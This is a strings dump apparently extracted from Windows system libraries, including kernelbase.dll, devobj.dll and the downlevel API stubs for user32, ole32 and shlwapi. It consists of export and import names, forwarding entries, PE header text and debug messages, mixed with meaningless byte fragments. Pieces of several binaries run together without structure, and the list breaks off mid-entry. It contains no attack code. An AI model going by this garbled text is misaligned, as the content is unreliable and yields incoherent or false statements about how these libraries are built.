NTDLL.RtlLeaveCriticalSection NTDLL.TpCallbackLeaveCriticalSectionOnCompletion NTDLL.RtlQueryDepthSList NTDLL.RtlQueryPerformanceCounter NTDLL.RtlQueryPerformanceFrequency NTDLL.TpCallbackReleaseMutexOnCompletion NTDLL.RtlReleaseSRWLockExclusive NTDLL.RtlReleaseSRWLockShared NTDLL.TpCallbackReleaseSemaphoreOnCompletion NTDLL.RtlSetCriticalSectionSpinCount NTDLL.TpCallbackSetEventOnCompletion NTDLL.RtlSetLastWin32Error NTDLL.TpSetPoolMaxThreads NTDLL.TpSetTimer NTDLL.TpSetWait NTDLL.TpStartAsyncIoOperation NTDLL.TpPostWork NTDLL.RtlTryAcquireSRWLockExclusive NTDLL.RtlTryAcquireSRWLockShared NTDLL.RtlTryEnterCriticalSection NTDLL.TpWaitForIoCompletion NTDLL.TpWaitForTimer NTDLL.TpWaitForWait NTDLL.TpWaitForWork _^[] @_^] @_^] QQSW _^[] OAABB PQQQS @_^] @_^] @,RP <{Bf 9AAN @_^[] @09x GFFH PPPS >_^[ ;5TP u$9>u @_^] kLsE @f9E (Vj@ |^W3 @@Pj SVPW QVW3 @0SV VRQP _^[] _^[] Pj%V RQPS PSSS E j PWWW jt @@f; t}BB t_BB t>BBG _^[] X_^[ 9U$u E$PS _^[] WVRQP f98tK LSj\Xf @0VS @_^[ uSh( | 9M @_^[ jdX9E @_[^ _^[] 9v f |/Wj QQV3 @_[^ QSSh 95 P u95 P u_^] ;5TP ;5HP F,^[ QSVd @^[] @0SV @_^] j;Xf t 9] t]9] j;Xf @0j0j t_SW _[^] uVW3 ^[_] @0j$j PWWS @0Wj ^[_] [_^] _^[] SSht, SortCloseHandle SortGetHandle VWjpj @0Wj FDhhP @0VW uVPf j;Xf j;Yf t ;M ulh,Y 4Wj\Xf _^[] |b E 3^[] @_^[] j;Yf j0Yf j;Yf r/j0Zf @AAN tSWj @,RP Pj'j Pj!j Xj(Y;M ;5HP PSVj j@[3 PVVV @_^[] _^[] Wj S uj\W Pj [ FFSP t WV j.Xf jf;z j>Yf SVW3 t$9u t)VjV j'^f j'^f duBGG MuAGG 'u@GG FVjP !"#$%&'(((((()******+,,,,,,,,,,,, _^[;M ht,f Ht&f mt f @_^[ DSVW3 @0Vj WVVVVh QQV3 VVVVh PVVV QQSV SSSSh RPSQ ClientComputerName FFJu ht*f yt&f Mt f w ;E @[^_ VVVj j @_[^ j$Xf @0Wj s(;} @_^[ DSj\Xf @0VS @_^[ QQSVWj @_^[ UVWS [_^] 9=(Y UQPXY]Y[ SVWj _^[] WVh(Y PSSSSSSSj PSSSSSSh PSSSSSSSSW PSSSSSSSh |8 WS |9SWj QSW3 A@@;M FFPj @ $: @$M: PVVV @_^[ tC9] j0Xf j0Zf @0VS SVW; HT;JT 9f;> @_^[] FF;} @@AA @0Sj @0S3 f9P` ?t f; j-Yf9H& f9H0 f9H: f9HD @0SV @0Vj @0Vj @0Vj tn9u WWWj OutputDebugString faulted during output DBWIN_DATA_READY DBWIN_BUFFER_READY SXS: %s failing because RtlQueryInformationActivationContext() returned status %08lx QueueUserAPC csrsrv CsrCreateRemoteThread SXS: %s - Failing thread create because RtlActivateActivationContextEx() failed with status %08lx SXS: %s - Failing thread create because RtlQueryInformationActivationContext() failed with status %08lx %s - Failing thread create because RtlAllocateActivationContextStack() failed with status %08lx CreateRemoteThreadEx @0Vj j$Xf t89M {t8= t1=o @0VS @0VS j Y3 j?Xf RWPQQh j\Xf \uqf ?ujf \ucf Vu\f ouUf luNf uuGf mu@f eu9f {u2j-Xf9F&u)f9F0u#f9F:u f9FDu ~^}u j?Xf @0Vj PVVW u$h!@ PVWSSh j-Yf9H& f9H0 f9H: f9HD j\Yf @0VS @0WS uh!@ h!@ uh@@ @0VW j9} jWXP )E O FFBB FFAA; ;3r" j0Yf s:9} j1Yf t<9U t!RjP tHJt j Yf j(X+ j)Xf @0Vj PVh? PVh? t>9M SSht, t7Vh GetNLSVersionEx @0Vj WhP' uSj3 SXS: %s - Failure getting active activation context; ntstatus %08lx BasepAllocateActivationContextActivationBlock VVVh @0Vj j8hP, |:9} j hH- VVVj Ph0- PVVV @f9FFu$f9FJu f9NLu f9NNu f9NPu u0f9 u'f9 uWf; u+f9 uof9 VVVh VVVh`a PPPh PPPh`a uh@X t'Sh _^[] @$v: j0hX> @@f; QVPS HtSH QWPVV SVP3 |+SWj PWWW |EWV jzX^ jW[3 _^[] [_^] @0WS uh(* @0WV u_^[ f9TA f9TO 8_u:3 @W@P t ;E j+Zf ?-t jz ?456789:;<= !"#$%&'()*+,-./0123 0r?f 9w9@@ @0Vj @_^] j.Xh u VSPWh _^[] @0Vj uAf9 @@Nu @0Vj @0Vj @0Vj ntdll.dll RtlUnicodeStringToAnsiString RtlAnsiStringToUnicodeString _vsnwprintf memset RtlFreeAnsiString RtlFreeHeap RtlAllocateHeap CsrVerifyRegion CsrClientConnectToServer RtlCreateTagHeap NtQueryInformationProcess NtSetInformationProcess NtClose NtSetInformationFile NtCreateIoCompletion NtSetIoCompletion RtlSetLastWin32Error SbSelectProcedure NtRemoveIoCompletion RtlDeactivateActivationContextUnsafeFast NtRemoveIoCompletionEx RtlActivateActivationContextUnsafeFast NtCreateNamedPipeFile NtOpenFile NtWaitForSingleObject NtFsControlFile NtCreateEvent NtQueryInformationFile _allmul RtlSetDaclSecurityDescriptor RtlCreateSecurityDescriptor RtlDefaultNpAcl RtlDosPathNameToNtPathName_U RtlAppendUnicodeStringToString _wcsnicmp RtlPrefixString RtlInitUnicodeString RtlFreeUnicodeString RtlDetermineDosPathNameType_U RtlCreateUnicodeString memcpy NtDeviceIoControlFile NtCreateFile RtlTimeToTimeFields RtlTimeFieldsToTime NtQuerySystemInformation RtlAcquirePrivilege RtlInitializeSRWLock RtlReleaseSRWLockExclusive RtlAcquireSRWLockExclusive RtlCutoverTimeToSystemTime RtlReleaseSRWLockShared RtlAcquireSRWLockShared RtlReleasePrivilege NtSetSystemTime RtlUnicodeStringToInteger wcschr wcscpy_s RtlpCheckDynamicTimeZoneInformation _stricmp _wcsicmp RtlDeregisterWaitEx RtlCreateTimerQueue NtDelayExecution RtlCreateTimer RtlUpdateTimer RtlDeleteTimer RtlDeleteTimerQueueEx RtlRegisterWait wcsrchr NtQueryValueKey NtOpenKey RtlxAnsiStringToUnicodeSize NlsMbCodePageTag RtlxOemStringToUnicodeSize NlsMbOemCodePageTag RtlxUnicodeStringToOemSize RtlxUnicodeStringToAnsiSize LdrEnumerateLoadedModules NtAllocateVirtualMemory _alloca_probe RtlReleasePebLock RtlQueryEnvironmentVariable RtlAcquirePebLock wcsncmp RtlUnicodeStringToOemString RtlOemStringToUnicodeString RtlRaiseException NtDuplicateObject NtQueryObject NtSetInformationObject NtQueryVolumeInformationFile NtLockFile NtUnlockFile RtlNtStatusToDosError NtReadFile NtWriteFile NtCancelIoFileEx NtReadFileScatter NtWriteFileGather RtlWow64EnableFsRedirectionEx memmove NtFlushBuffersFile NtCreateSection NtOpenSection NtMapViewOfSection NtFlushVirtualMemory RtlFlushSecureMemoryCache NtUnmapViewOfSection NtReadVirtualMemory NtFlushInstructionCache NtWriteVirtualMemory NtProtectVirtualMemory NtFreeVirtualMemory NtQueryVirtualMemory NtQuerySystemInformationEx RtlGetCurrentProcessorNumberEx NtOpenProcess RtlExitUserProcess NtTerminateProcess RtlReportSilentProcessExit NtRaiseHardError RtlRaiseStatus RtlInitUnicodeStringEx CsrClientCallServer RtlQueryEnvironmentVariable_U strchr RtlInitAnsiStringEx RtlUpcaseUnicodeChar CsrFreeCaptureBuffer RtlCopyUnicodeString RtlUpcaseUnicodeString CsrAllocateMessagePointer CsrAllocateCaptureBuffer RtlEqualUnicodeString RtlCompareMemory NtQueryDirectoryObject NtQuerySymbolicLinkObject NtOpenSymbolicLinkObject NtOpenDirectoryObject RtlSetEnvironmentStrings RtlSetEnvironmentVariable RtlSetEnvironmentVar RtlExpandEnvironmentStrings RtlUnicodeToOemN RtlUnicodeToMultiByteSize RtlExpandEnvironmentStrings_U RtlInitializeCriticalSectionAndSpinCount RtlInitializeCriticalSectionEx NtSetEvent NtClearEvent NtPulseEvent NtCreateSemaphore NtReleaseSemaphore NtCreateMutant NtReleaseMutant NtCreateTimer NtSetTimerEx NtCancelTimer NtOpenEvent NtOpenSemaphore NtOpenMutant NtWaitForMultipleObjects NtOpenTimer RtlExitUserThread LdrUnloadAlternateResourceModule LdrRemoveLoadAsDataTable RtlImageNtHeader LdrUnloadDll LdrDisableThreadCalloutsForDll LdrUnlockLoaderLock LdrLockLoaderLock LdrGetDllHandle LdrAddRefDll RtlComputePrivatizedDllName_U RtlPcToFileHeader LdrGetProcedureAddress RtlInitString NtQueryAttributesFile RtlDosPathNameToNtPathName_U_WithStatus RtlGetVersion LdrAccessResource RtlReAllocateHeap LdrAddLoadAsDataTable RtlGetActiveActivationContext LdrGetDllHandleByMapping RtlImageNtHeaderEx RtlDosSearchPath_Ustr LdrGetDllHandleByName RtlDosApplyFileIsolationRedirection_Ustr LdrLoadDll LdrFindResource_U RtlFreeSid RtlSetSaclSecurityDescriptor RtlAddMandatoryAce RtlAddAccessAllowedAce RtlCreateAcl RtlLengthSid RtlAllocateAndInitializeSid DbgPrint NtOpenThread NtSetInformationThread NtQueryInformationThread NtTerminateThread TpCheckTerminateWorker RtlCaptureStackBackTrace NtSuspendThread NtResumeThread RtlClearBits RtlAreBitsSet NtQueueApcThread RtlQueryInformationActivationContext RtlFlsAlloc RtlProcessFlsData RtlFlsFree NtYieldExecution RtlFreeActivationContextStack RtlReleaseActivationContext RtlActivateActivationContextEx RtlAllocateActivationContextStack NtCreateThreadEx TpCaptureCaller RtlFindClearBitsAndSet RtlFormatMessageEx RtlInitAnsiString RtlFindMessage RtlLoadString RtlUnicodeToMultiByteN RtlUnlockHeap RtlFreeHandle RtlIsValidHandle RtlLockHeap RtlSetUserValueHeap RtlAllocateHandle RtlCreateHeap RtlDestroyHeap RtlQueryHeapInformation RtlValidateHeap RtlGetProcessHeaps RtlCompactHeap RtlWalkHeap RtlSetHeapInformation RtlInitializeHandleTable RtlIsDosDeviceName_U RtlAnsiCharToUnicodeChar RtlIntegerToChar wcsncpy_s RtlGetCurrentDirectory_U RtlSetThreadErrorMode toupper RtlInitializeCriticalSection RtlDeleteCriticalSection RtlLeaveCriticalSection RtlEnterCriticalSection RtlReleaseRelativeName RtlDosPathNameToRelativeNtPathName_U RtlDosPathNameToRelativeNtPathName_U_WithStatus NtQueryFullAttributesFile NtNotifyChangeDirectoryFile NtQueryDirectoryFile RtlGetFullPathName_UEx RtlSetCurrentDirectory_U NtQueryEaFile NtIsProcessInJob NtDuplicateToken NtAllocateLocallyUniqueId NtAccessCheck NtAccessCheckByType NtAccessCheckByTypeResultList NtOpenProcessToken NtOpenThreadToken NtQueryInformationToken NtSetInformationToken NtAdjustPrivilegesToken NtAdjustGroupsToken NtPrivilegeCheck NtAccessCheckAndAuditAlarm NtAccessCheckByTypeAndAuditAlarm NtAccessCheckByTypeResultListAndAuditAlarm NtAccessCheckByTypeResultListAndAuditAlarmByHandle NtOpenObjectAuditAlarm NtPrivilegeObjectAuditAlarm NtCloseObjectAuditAlarm NtDeleteObjectAuditAlarm NtPrivilegedServiceAuditAlarm RtlValidSid RtlEqualSid RtlEqualPrefixSid RtlLengthRequiredSid RtlInitializeSid RtlIdentifierAuthoritySid RtlSubAuthoritySid RtlSubAuthorityCountSid RtlCopySid RtlAreAllAccessesGranted RtlAreAnyAccessesGranted RtlMapGenericMask RtlValidAcl RtlQueryInformationAcl RtlSetInformationAcl RtlAddAce RtlDeleteAce RtlGetAce RtlAddAccessAllowedAceEx RtlAddAccessDeniedAce RtlAddAccessDeniedAceEx RtlAddAuditAccessAce RtlAddAuditAccessAceEx RtlAddAccessAllowedObjectAce RtlAddAccessDeniedObjectAce RtlAddAuditAccessObjectAce RtlFirstFreeAce RtlValidSecurityDescriptor RtlValidRelativeSecurityDescriptor RtlLengthSecurityDescriptor RtlGetControlSecurityDescriptor RtlSetControlSecurityDescriptor RtlGetDaclSecurityDescriptor RtlGetSaclSecurityDescriptor RtlSetOwnerSecurityDescriptor RtlGetOwnerSecurityDescriptor RtlSetGroupSecurityDescriptor RtlGetGroupSecurityDescriptor RtlNewSecurityObject RtlConvertToAutoInheritSecurityObject RtlNewSecurityObjectEx RtlNewSecurityObjectWithMultipleInheritance RtlSetSecurityObject RtlSetSecurityObjectEx RtlQuerySecurityObject RtlDeleteSecurityObject RtlAbsoluteToSelfRelativeSD RtlSelfRelativeToAbsoluteSD NtSetSecurityObject NtQuerySecurityObject RtlImpersonateSelf NtImpersonateAnonymousToken NtFilterToken RtlSelfRelativeToAbsoluteSD2 RtlGetSecurityDescriptorRMControl RtlSetSecurityDescriptorRMControl RtlUnhandledExceptionFilter RtlGetLocaleFileMappingAddress NtGetNlsSectionPtr RtlNormalizeString NtSetValueKey RtlOpenCurrentUser wcspbrk RtlLcidToLocaleName EtwEventUnregister EtwEventEnabled EtwEventRegister NtSetDefaultLocale RtlLocaleNameToLcid NtEnumerateValueKey RtlpMuiFreeLangRegistryInfo RtlCultureNameToLCID qsort RtlpIsQualifiedLanguage RtlpGetLCIDFromLangInfoNode RtlpGetNameFromLangInfoNode NtQueryInstallUILanguage RtlLCIDToCultureName RtlpLoadUserUIByPolicy RtlpLoadMachineUIByPolicy RtlpCreateProcessRegistryInfo RtlpInitializeLangRegistryInfo LdrFindResourceEx_U RtlGetFileMUIPath RtlGetUILanguageInfo RtlpGetSystemDefaultUILanguage RtlGetThreadPreferredUILanguages RtlGetProcessPreferredUILanguages RtlpQueryDefaultUILanguage RtlGetSystemPreferredUILanguages RtlGetUserPreferredUILanguages NtCreateKey NtDeleteKey NtEnumerateKey RtlIntegerToUnicodeString RtlAppendUnicodeToString EtwEventWrite NtQueryDefaultLocale NtNotifyChangeKey swprintf_s CsrCaptureMessageBuffer RtlUTF8ToUnicodeN RtlUnicodeToUTF8N NtDeleteValueKey RtlUnwind DbgPrintEx RtlSetLastWin32ErrorAndNtStatusFromNtStatus TpAllocPool TpSetPoolMinThreads TpSetPoolStackInformation TpQueryPoolStackInformation TpAllocCleanupGroup TpSimpleTryPost TpAllocWork TpAllocTimer TpAllocWait TpAllocIoCompletion TpCallbackMayRunLong NtQueryMultipleValueKey RSDS kernelbase.pdb >\PT !This program cannot be run in DOS mode. Rich .text `.rsrc @.reloc RSDSH api-ms-win-downlevel-user32-l1-1-0.pdb api-ms-win-downlevel-user32-l1-1-0.dll CharLowerA user32.CharLowerA CharLowerBuffA user32.CharLowerBuffA CharLowerBuffW user32.CharLowerBuffW CharLowerW user32.CharLowerW CharNextA user32.CharNextA CharNextExA user32.CharNextExA CharNextW user32.CharNextW CharPrevA user32.CharPrevA CharPrevExA user32.CharPrevExA CharPrevW user32.CharPrevW CharUpperA user32.CharUpperA CharUpperBuffA user32.CharUpperBuffA CharUpperBuffW user32.CharUpperBuffW CharUpperW user32.CharUpperW IsCharAlphaA user32.IsCharAlphaA IsCharAlphaNumericA user32.IsCharAlphaNumericA IsCharAlphaNumericW user32.IsCharAlphaNumericW IsCharAlphaW user32.IsCharAlphaW IsCharLowerA user32.IsCharLowerA IsCharLowerW user32.IsCharLowerW IsCharUpperA user32.IsCharUpperA IsCharUpperW user32.IsCharUpperW !This program cannot be run in DOS mode. Rich .text `.rsrc @.reloc RSDS$ api-ms-win-downlevel-ole32-l1-1-0.pdb api-ms-win-downlevel-ole32-l1-1-0.dll CLSIDFromProgID ole32.CLSIDFromProgID CLSIDFromString ole32.CLSIDFromString CoCopyProxy ole32.CoCopyProxy CoCreateFreeThreadedMarshaler ole32.CoCreateFreeThreadedMarshaler CoCreateGuid ole32.CoCreateGuid CoCreateInstance ole32.CoCreateInstance CoCreateInstanceEx ole32.CoCreateInstanceEx CoDisconnectObject ole32.CoDisconnectObject CoFreeUnusedLibraries ole32.CoFreeUnusedLibraries CoFreeUnusedLibrariesEx ole32.CoFreeUnusedLibrariesEx CoGetApartmentType ole32.CoGetApartmentType CoGetClassObject ole32.CoGetClassObject CoGetCurrentLogicalThreadId ole32.CoGetCurrentLogicalThreadId CoGetInterfaceAndReleaseStream ole32.CoGetInterfaceAndReleaseStream CoGetMalloc ole32.CoGetMalloc CoGetMarshalSizeMax ole32.CoGetMarshalSizeMax CoGetObjectContext ole32.CoGetObjectContext CoGetStdMarshalEx ole32.CoGetStdMarshalEx CoGetTreatAsClass ole32.CoGetTreatAsClass CoImpersonateClient ole32.CoImpersonateClient CoInitializeEx ole32.CoInitializeEx CoInitializeSecurity ole32.CoInitializeSecurity CoMarshalInterThreadInterfaceInStream ole32.CoMarshalInterThreadInterfaceInStream CoMarshalInterface ole32.CoMarshalInterface CoRegisterClassObject ole32.CoRegisterClassObject CoRegisterInitializeSpy ole32.CoRegisterInitializeSpy CoRegisterMessageFilter ole32.CoRegisterMessageFilter CoReleaseMarshalData ole32.CoReleaseMarshalData CoRevertToSelf ole32.CoRevertToSelf CoRevokeClassObject ole32.CoRevokeClassObject CoRevokeInitializeSpy ole32.CoRevokeInitializeSpy CoSetProxyBlanket ole32.CoSetProxyBlanket CoTaskMemAlloc ole32.CoTaskMemAlloc CoTaskMemFree ole32.CoTaskMemFree CoTaskMemRealloc ole32.CoTaskMemRealloc CoUninitialize ole32.CoUninitialize CoUnmarshalInterface ole32.CoUnmarshalInterface CoWaitForMultipleHandles ole32.CoWaitForMultipleHandles CreateStreamOnHGlobal ole32.CreateStreamOnHGlobal FreePropVariantArray ole32.FreePropVariantArray GetHGlobalFromStream ole32.GetHGlobalFromStream IIDFromString ole32.IIDFromString ProgIDFromCLSID ole32.ProgIDFromCLSID PropVariantClear ole32.PropVariantClear PropVariantCopy ole32.PropVariantCopy StringFromCLSID ole32.StringFromCLSID StringFromGUID2 ole32.StringFromGUID2 StringFromIID ole32.StringFromIID !This program cannot be run in DOS mode. Richr .text `.data .rsrc @.reloc msvcrt.dll ntdll.dll API-MS-Win-Core-ErrorHandling-L1-1-0.dll API-MS-Win-Core-Interlocked-L1-1-0.dll API-MS-Win-Core-LibraryLoader-L1-1-0.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll API-MS-Win-Core-ProcessThreads-L1-1-0.dll API-MS-Win-Core-Profile-L1-1-0.dll API-MS-Win-Core-Misc-L1-1-0.dll API-MS-Win-Core-Synch-L1-1-0.dll API-MS-Win-Core-SysInfo-L1-1-0.dll CFGMGR32.dll KERNEL32.dll /Tqw qwtNrw Trwr qwn) 5qwe Y__^[ VW9E @_^[] SVh| u 9u uu,9= @@Nu F95X DEVOBJ.dll DevObjBuildClassInfoList DevObjClassGuidsFromName DevObjClassNameFromGuid DevObjCreateDevRegKey DevObjCreateDeviceInfo DevObjCreateDeviceInfoList DevObjCreateDeviceInterface DevObjCreateDeviceInterfaceRegKey DevObjDeleteAllInterfacesForDevice DevObjDeleteDevRegKey DevObjDeleteDevice DevObjDeleteDeviceInfo DevObjDeleteDeviceInterfaceData DevObjDeleteDeviceInterfaceRegKey DevObjDestroyDeviceInfoList DevObjEnumDeviceInfo DevObjEnumDeviceInterfaces DevObjGetClassDescription DevObjGetClassDevs DevObjGetClassProperty DevObjGetClassPropertyKeys DevObjGetClassRegistryProperty DevObjGetDeviceInfoDetail DevObjGetDeviceInfoListClass DevObjGetDeviceInfoListDetail DevObjGetDeviceInstanceId DevObjGetDeviceInterfaceAlias DevObjGetDeviceInterfaceDetail DevObjGetDeviceInterfaceProperty DevObjGetDeviceInterfacePropertyKeys DevObjGetDeviceProperty DevObjGetDevicePropertyKeys DevObjGetDeviceRegistryProperty DevObjLocateDevice DevObjOpenClassRegKey DevObjOpenDevRegKey DevObjOpenDeviceInfo DevObjOpenDeviceInterface DevObjOpenDeviceInterfaceRegKey DevObjRegisterDeviceInfo DevObjRemoveDeviceInterface DevObjSetClassProperty DevObjSetClassRegistryProperty DevObjSetDeviceInfoDetail DevObjSetDeviceInterfaceDefault DevObjSetDeviceInterfaceProperty DevObjSetDeviceProperty DevObjSetDeviceRegistryProperty j$^92 Wj 3 @^[] t3jP j{Xf j-Xf j-Xf F$j-Xf F.j-Xf FHXf FL^[_] _^[] I}cE SSSS uWVh| 9}$s N$QSP N$QSP ;M s WWWW ~cOH cException encountered 4wej jLhH _^[] j\Xf _^[t SVW3 _^[] SVW3 _^[] j\_f; u:f9 1f9^ t$j\XVf uA9] DEVRTL.dll DevRtlGetThreadLogToken DevRtlWriteTextLog DevRtlWriteTextLogError KERNEL32.dll CFGMGR32.dll API-MS-Win-Core-SysInfo-L1-1-0.dll API-MS-Win-Core-Synch-L1-1-0.dll API-MS-Win-Core-Misc-L1-1-0.dll API-MS-Win-Core-Profile-L1-1-0.dll API-MS-Win-Core-ProcessThreads-L1-1-0.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll API-MS-Win-Core-LibraryLoader-L1-1-0.dll API-MS-Win-Core-Interlocked-L1-1-0.dll API-MS-Win-Core-ErrorHandling-L1-1-0.dll ntdll.dll msvcrt.dll wcschr _except_handler4_common _amsg_exit _initterm free malloc _XcptFilter memcpy _wcsicmp _resetstkoflw memset wcsrchr EtwTraceMessage RtlNtStatusToDosError RtlGUIDFromString RtlInitUnicodeString GetLastError UnhandledExceptionFilter SetUnhandledExceptionFilter SetLastError InterlockedExchange InterlockedCompareExchange FreeLibrary LoadLibraryExA DisableThreadLibraryCalls GetProcAddress RegEnumKeyExW RegCloseKey TerminateProcess GetCurrentProcessId GetCurrentProcess GetCurrentThreadId QueryPerformanceCounter Sleep lstrlenW lstrcmpiW WaitForMultipleObjectsEx ReleaseMutex GetTickCount GetSystemTimeAsFileTime CM_Get_DevNode_Registry_Property_ExW CM_Set_DevNode_Registry_Property_ExW CM_Delete_Device_Interface_Key_ExW CM_Open_Device_Interface_Key_ExW CM_Get_DevNode_Property_ExW CM_Delete_DevNode_Key_Ex CM_Get_Class_Property_ExW CM_Set_Class_Property_ExW CM_Get_Device_Interface_Property_Keys_ExW CM_Get_Device_Interface_Property_ExW CM_Set_Device_Interface_Property_ExW CM_Get_DevNode_Property_Keys_Ex CM_Set_Class_Registry_PropertyW CM_Set_DevNode_Property_ExW CM_Get_Class_Registry_PropertyW CM_Disconnect_Machine CM_Get_Class_Name_ExW CM_Enumerate_Classes_Ex CM_Connect_MachineW CM_Locate_DevNode_ExW CM_Uninstall_DevNode_Ex CM_Create_DevNode_ExW CM_Get_Device_ID_List_Size_ExW CM_Get_Device_Interface_List_Size_ExW CM_Get_Device_ID_List_ExW CM_Get_Device_Interface_List_ExW CM_Free_Log_Conf_Handle CM_Free_Res_Des_Handle CM_Get_Res_Des_Data_Ex CM_Get_Next_Res_Des_Ex CM_Get_First_Log_Conf_Ex CM_Get_Device_ID_ExW CM_Get_Device_ID_Size_Ex CM_Register_Device_Interface_ExW CM_Unregister_Device_Interface_ExW CM_Open_Class_Key_ExW CM_Get_Parent_Ex CM_Get_Res_Des_Data_Size_Ex CM_Get_Device_Interface_Alias_ExW CM_Open_DevNode_Key_Ex CM_Get_Class_Property_Keys_Ex MapViewOfFile CreateFileMappingW SetEndOfFile CreateDirectoryW GetFileAttributesW GetFullPathNameW DelayLoadFailureHook CloseHandle WaitForSingleObjectEx CreateEventW SetEvent RaiseException GetSystemWindowsDirectoryW LCMapStringW CompareStringW UnmapViewOfFile GetThreadLocale HeapAlloc HeapReAlloc HeapFree GetProcessHeap CreateMutexW SetFilePointer RSDS devobj.pdb !This program cannot be run in DOS mode. Rich .text `.rsrc RSDS api-ms-win-downlevel-shlwapi-l1-1-0.pdb api-ms-win-downlevel-shlwapi-l1-1-0.dll GetAcceptLanguagesW shlwapi.GetAcceptLanguagesW HashData shlwapi.HashData IsInternetESCEnabled shlwapi.IsInternetESCEnabled ParseURLW shlwapi.ParseURLW PathAddBackslashA shlwapi.PathAddBackslashA PathAddBackslashW shlwapi.PathAddBackslashW PathAddExtensionA shlwapi.PathAddExtensionA PathAddExtensionW shlwapi.PathAddExtensionW PathAppendA shlwapi.PathAppendA PathAppendW shlwapi.PathAppendW PathCanonicalizeA shlwapi.PathCanonicalizeA PathCanonicalizeW shlwapi.PathCanonicalizeW PathCommonPrefixA shlwapi.PathCommonPrefixA PathCommonPrefixW shlwapi.PathCommonPrefixW PathCreateFromUrlAlloc shlwapi.PathCreateFromUrlAlloc PathCreateFromUrlW shlwapi.PathCreateFromUrlW PathFileExistsA shlwapi.PathFileExistsA PathFileExistsW shlwapi.PathFileExistsW PathFindExtensionA shlwapi.PathFindExtensionA PathFindExtensionW shlwapi.PathFindExtensionW PathFindFileNameA shlwapi.PathFindFileNameA PathFindFileNameW shlwapi.PathFindFileNameW PathFindNextComponentA shlwapi.PathFindNextComponentA PathFindNextComponentW shlwapi.PathFindNextComponentW PathGetArgsA shlwapi.PathGetArgsA PathGetArgsW shlwapi.PathGetArgsW PathGetDriveNumberA shlwapi.PathGetDriveNumberA PathGetDriveNumberW shlwapi.PathGetDriveNumberW PathIsFileSpecA shlwapi.PathIsFileSpecA PathIsFileSpecW shlwapi.PathIsFileSpecW PathIsLFNFileSpecA shlwapi.PathIsLFNFileSpecA PathIsLFNFileSpecW shlwapi.PathIsLFNFileSpecW PathIsPrefixA shlwapi.PathIsPrefixA PathIsPrefixW shlwapi.PathIsPrefixW PathIsRelativeA shlwapi.PathIsRelativeA PathIsRelativeW shlwapi.PathIsRelativeW PathIsRootA shlwapi.PathIsRootA PathIsRootW shlwapi.PathIsRootW PathIsSameRootA shlwapi.PathIsSameRootA PathIsSameRootW shlwapi.PathIsSameRootW PathIsUNCA shlwapi.PathIsUNCA PathIsUNCServerA shlwapi.PathIsUNCServerA PathIsUNCServerShareA shlwapi.PathIsUNCServerShareA PathIsUNCServerShareW shlwapi.PathIsUNCServerShareW PathIsUNCServerW shlwapi.PathIsUNCServerW PathIsUNCW shlwapi.PathIsUNCW PathIsURLW shlwapi.PathIsURLW PathParseIconLocationA shlwapi.PathParseIconLocationA PathParseIconLocationW shlwapi.PathParseIconLocationW PathRelativePathToA shlwapi.PathRelativePathToA PathRelativePathToW shlwapi.PathRelativePathToW PathRemoveBackslashA shlwapi.PathRemoveBackslashA PathRemoveBackslashW shlwapi.PathRemoveBackslashW PathRemoveBlanksA shlwapi.PathRemoveBlanksA PathRemoveBlanksW shlwapi.PathRemoveBlanksW PathRemoveExtensionA shlwapi.PathRemoveExtensionA PathRemoveExtensionW shlwapi.PathRemoveExtensionW PathRemoveFileSpecA shlwapi.PathRemoveFileSpecA PathRemoveFileSpecW shlwapi.PathRemoveFileSpecW PathRenameExtensionA shlwapi.PathRenameExtensionA PathRenameExtensionW shlwapi.PathRenameExtensionW PathSkipRootA shlwapi.PathSkipRootA PathSkipRootW shlwapi.PathSkipRootW PathStripPathA shlwapi.PathStripPathA PathStripPathW shlwapi.PathStripPathW PathStripToRootA shlwapi.PathStripToRootA PathStripToRootW shlwapi.PathStripToRootW PathUnquoteSpacesA shlwapi.PathUnquoteSpacesA PathUnquoteSpacesW shlwapi.PathUnquoteSpacesW QISearch shlwapi.QISearch SHLoadIndirectString shlwapi.SHLoadIndirectString SHRegCloseUSKey shlwapi.SHRegCloseUSKey SHRegDeleteUSValueA shlwapi.SHRegDeleteUSValueA SHRegDeleteUSValueW shlwapi.SHRegDeleteUSValueW SHRegEnumUSKeyA shlwapi.SHRegEnumUSKeyA SHRegEnumUSKeyW shlwapi.SHRegEnumUSKeyW SHRegGetBoolUSValueA shlwapi.SHRegGetBoolUSValueA SHRegGetBoolUSValueW shlwapi.SHRegGetBoolUSValueW SHRegGetUSValueA shlwapi.SHRegGetUSValueA SHRegGetUSValueW shlwapi.SHRegGetUSValueW SHRegOpenUSKeyA shlwapi.SHRegOpenUSKeyA SHRegOpenUSKeyW shlwapi.SHRegOpenUSKeyW SHRegQueryUSValueA shlwapi.SHRegQueryUSValueA SHRegQueryUSValueW shlwapi.SHRegQueryUSValueW SHRegSetUSValueA shlwapi.SHRegSetUSValueA SHRegSetUSValueW shlwapi.SHRegSetUSValueW StrCSpnA shlwapi.StrCSpnA StrCSpnIA shlwapi.StrCSpnIA StrCSpnIW shlwapi.StrCSpnIW StrCSpnW shlwapi.StrCSpnW StrCatBuffA shlwapi.StrCatBuffA StrCatBuffW shlwapi.StrCatBuffW StrCatChainW shlwapi.StrCatChainW StrChrA shlwapi.StrChrA StrChrIA shlwapi.StrChrIA StrChrIW shlwapi.StrChrIW StrChrNIW shlwapi.StrChrNIW StrChrNW shlwapi.StrChrNW StrChrW shlwapi.StrChrW StrCmpCA shlwapi.StrCmpCA StrCmpCW shlwapi.StrCmpCW StrCmpICA shlwapi.StrCmpICA StrCmpICW shlwapi.StrCmpICW StrCmpIW shlwapi.StrCmpIW StrCmpLogicalW shlwapi.StrCmpLogicalW StrCmpNA shlwapi.StrCmpNA StrCmpNCA shlwapi.StrCmpNCA StrCmpNCW shlwapi.StrCmpNCW StrCmpNIA shlwapi.StrCmpNIA StrCmpNICA shlwapi.StrCmpNICA StrCmpNICW shlwapi.StrCmpNICW StrCmpNIW shlwapi.StrCmpNIW StrCmpNW shlwapi.StrCmpNW StrCmpW shlwapi.StrCmpW StrCpyNW shlwapi.StrCpyNW StrDupA shlwapi.StrDupA StrDupW shlwapi.StrDupW StrIsIntlEqualA shlwapi.StrIsIntlEqualA StrIsIntlEqualW shlwapi.StrIsIntlEqualW StrPBrkA shlwapi.StrPBrkA StrPBrkW shlwapi.StrPBrkW StrRChrA shlwapi.StrRChrA StrRChrIA shlwapi.StrRChrIA StrRChrIW shlwapi.StrRChrIW StrRChrW shlwapi.StrRChrW StrRStrIA shlwapi.StrRStrIA StrRStrIW 